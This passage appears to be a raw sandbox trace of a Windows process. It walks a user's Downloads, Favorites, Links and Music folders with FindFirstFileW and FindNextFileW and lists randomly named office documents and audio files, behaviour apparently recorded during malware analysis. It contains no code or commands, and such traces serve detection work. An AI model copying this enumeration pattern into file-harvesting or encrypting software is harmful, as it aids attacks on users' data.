cFileName="UUc ZLKDl.csv", cAlternateFileName="UUCZLK~1.CSV")) returned 1 [0094.267] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53648da0, ftCreationTime.dwHighDateTime=0x1d571d1, ftLastAccessTime.dwLowDateTime=0x1255b460, ftLastAccessTime.dwHighDateTime=0x1d54e04, ftLastWriteTime.dwLowDateTime=0x1255b460, ftLastWriteTime.dwHighDateTime=0x1d54e04, nFileSizeHigh=0x0, nFileSizeLow=0x94eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WCZ6DRA.xlsx", cAlternateFileName="WCZ6DR~1.XLS")) returned 1 [0094.267] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f322880, ftCreationTime.dwHighDateTime=0x1d55cde, ftLastAccessTime.dwLowDateTime=0x8a883ff0, ftLastAccessTime.dwHighDateTime=0x1d5c1c9, ftLastWriteTime.dwLowDateTime=0x8a883ff0, ftLastWriteTime.dwHighDateTime=0x1d5c1c9, nFileSizeHigh=0x0, nFileSizeLow=0xde40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WmeGhCG57Q.xlsx", cAlternateFileName="WMEGHC~1.XLS")) returned 1 [0094.267] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2c0b740, ftCreationTime.dwHighDateTime=0x1d555e3, ftLastAccessTime.dwLowDateTime=0x7977f050, ftLastAccessTime.dwHighDateTime=0x1d57883, ftLastWriteTime.dwLowDateTime=0x7977f050, ftLastWriteTime.dwHighDateTime=0x1d57883, nFileSizeHigh=0x0, nFileSizeLow=0xa068, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x6TvOU93J WY9K-S_.pptx", cAlternateFileName="X6TVOU~1.PPT")) returned 1 [0094.267] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf33083b0, ftCreationTime.dwHighDateTime=0x1d5c1d7, ftLastAccessTime.dwLowDateTime=0x6f7246e0, ftLastAccessTime.dwHighDateTime=0x1d5c447, ftLastWriteTime.dwLowDateTime=0x6f7246e0, ftLastWriteTime.dwHighDateTime=0x1d5c447, nFileSizeHigh=0x0, nFileSizeLow=0xff65, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xJ2wy0-YqW7HZJEM29.rtf", cAlternateFileName="XJ2WY0~1.RTF")) returned 1 [0094.267] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd5109e0, ftCreationTime.dwHighDateTime=0x1d5bcf4, ftLastAccessTime.dwLowDateTime=0xb7cf55d0, ftLastAccessTime.dwHighDateTime=0x1d5ba0c, ftLastWriteTime.dwLowDateTime=0xb7cf55d0, ftLastWriteTime.dwHighDateTime=0x1d5ba0c, nFileSizeHigh=0x0, nFileSizeLow=0x16eef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xQkheU94ecT41Hfv.pptx", cAlternateFileName="XQKHEU~1.PPT")) returned 1 [0094.268] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3a02490, ftCreationTime.dwHighDateTime=0x1d56619, ftLastAccessTime.dwLowDateTime=0x6b964af0, ftLastAccessTime.dwHighDateTime=0x1d5bfc2, ftLastWriteTime.dwLowDateTime=0x6b964af0, ftLastWriteTime.dwHighDateTime=0x1d5bfc2, nFileSizeHigh=0x0, nFileSizeLow=0xb8b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y2SVijXO1-hEI.pptx", cAlternateFileName="Y2SVIJ~1.PPT")) returned 1 [0094.268] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa41ccbe0, ftCreationTime.dwHighDateTime=0x1d5bae7, ftLastAccessTime.dwLowDateTime=0x60f7b740, ftLastAccessTime.dwHighDateTime=0x1d5b910, ftLastWriteTime.dwLowDateTime=0x60f7b740, ftLastWriteTime.dwHighDateTime=0x1d5b910, nFileSizeHigh=0x0, nFileSizeLow=0x135da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yac0tbNe-C1 iM.rtf", cAlternateFileName="YAC0TB~1.RTF")) returned 1 [0094.268] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7aaeafb0, ftCreationTime.dwHighDateTime=0x1d5b599, ftLastAccessTime.dwLowDateTime=0xf16076f0, ftLastAccessTime.dwHighDateTime=0x1d5bbea, ftLastWriteTime.dwLowDateTime=0xf16076f0, ftLastWriteTime.dwHighDateTime=0x1d5bbea, nFileSizeHigh=0x0, nFileSizeLow=0x41f5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZC9nbsIIkz-871Ly.docx", cAlternateFileName="ZC9NBS~1.DOC")) returned 1 [0094.268] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15f4a1d0, ftCreationTime.dwHighDateTime=0x1d5bcf9, ftLastAccessTime.dwLowDateTime=0x35a1de20, ftLastAccessTime.dwHighDateTime=0x1d5c2fe, ftLastWriteTime.dwLowDateTime=0x35a1de20, ftLastWriteTime.dwHighDateTime=0x1d5c2fe, nFileSizeHigh=0x0, nFileSizeLow=0x12464, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_SiYzjXVaSCNyN_APIVN.pptx", cAlternateFileName="_SIYZJ~1.PPT")) returned 1 [0094.268] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15f4a1d0, ftCreationTime.dwHighDateTime=0x1d5bcf9, ftLastAccessTime.dwLowDateTime=0x35a1de20, ftLastAccessTime.dwHighDateTime=0x1d5c2fe, ftLastWriteTime.dwLowDateTime=0x35a1de20, ftLastWriteTime.dwHighDateTime=0x1d5c2fe, nFileSizeHigh=0x0, nFileSizeLow=0x12464, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_SiYzjXVaSCNyN_APIVN.pptx", cAlternateFileName="_SIYZJ~1.PPT")) returned 0 [0094.268] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.268] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce7b8 [0094.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.268] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0094.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330810 [0094.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0094.269] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33172f8 [0094.269] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.269] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.269] PathFindFileNameW (pszPath="") returned="" [0094.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce7b8 [0094.269] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.269] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.269] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0094.269] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0094.270] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.270] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce7b8 [0094.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.270] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0094.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330810 [0094.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0094.270] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33172f8 [0094.270] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.270] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.270] PathFindFileNameW (pszPath="") returned="" [0094.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce7b8 [0094.271] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.271] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.271] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0094.271] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0094.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce7b8 [0094.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0094.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.271] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0094.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0094.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0094.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0094.272] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0094.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332db28 [0094.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dab0 [0094.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x214) returned 0x32d0958 [0094.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce7b8 [0094.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0094.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0094.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0094.272] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0094.272] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0094.272] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.273] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.273] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0094.273] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.273] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.273] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.273] PathFindFileNameW (pszPath="") returned="" [0094.273] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.273] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.273] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0094.273] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0094.273] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0094.274] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0094.274] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0094.274] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.274] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.274] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0094.274] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.274] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.274] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.274] PathFindFileNameW (pszPath="") returned="" [0094.274] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0094.275] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.275] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0094.275] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.275] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.275] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.275] PathFindFileNameW (pszPath="") returned="" [0094.275] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fdfda30, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fdfda30, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.275] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fdfda30, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fdfda30, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.276] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c08d360, ftCreationTime.dwHighDateTime=0x1d5c37a, ftLastAccessTime.dwLowDateTime=0x798c8ca0, ftLastAccessTime.dwHighDateTime=0x1d5b6f3, ftLastWriteTime.dwLowDateTime=0x798c8ca0, ftLastWriteTime.dwHighDateTime=0x1d5b6f3, nFileSizeHigh=0x0, nFileSizeLow=0x16c3e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0i5A.mp3", cAlternateFileName="")) returned 1 [0094.276] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb46f6b70, ftCreationTime.dwHighDateTime=0x1d5c4a0, ftLastAccessTime.dwLowDateTime=0x19805db0, ftLastAccessTime.dwHighDateTime=0x1d5bec7, ftLastWriteTime.dwLowDateTime=0x19805db0, ftLastWriteTime.dwHighDateTime=0x1d5bec7, nFileSizeHigh=0x0, nFileSizeLow=0xbc57, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2pX7N-b_.mp3", cAlternateFileName="")) returned 1 [0094.276] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45591320, ftCreationTime.dwHighDateTime=0x1d5c0a5, ftLastAccessTime.dwLowDateTime=0x3f3c29b0, ftLastAccessTime.dwHighDateTime=0x1d5c0c7, ftLastWriteTime.dwLowDateTime=0x3f3c29b0, ftLastWriteTime.dwHighDateTime=0x1d5c0c7, nFileSizeHigh=0x0, nFileSizeLow=0x2945, 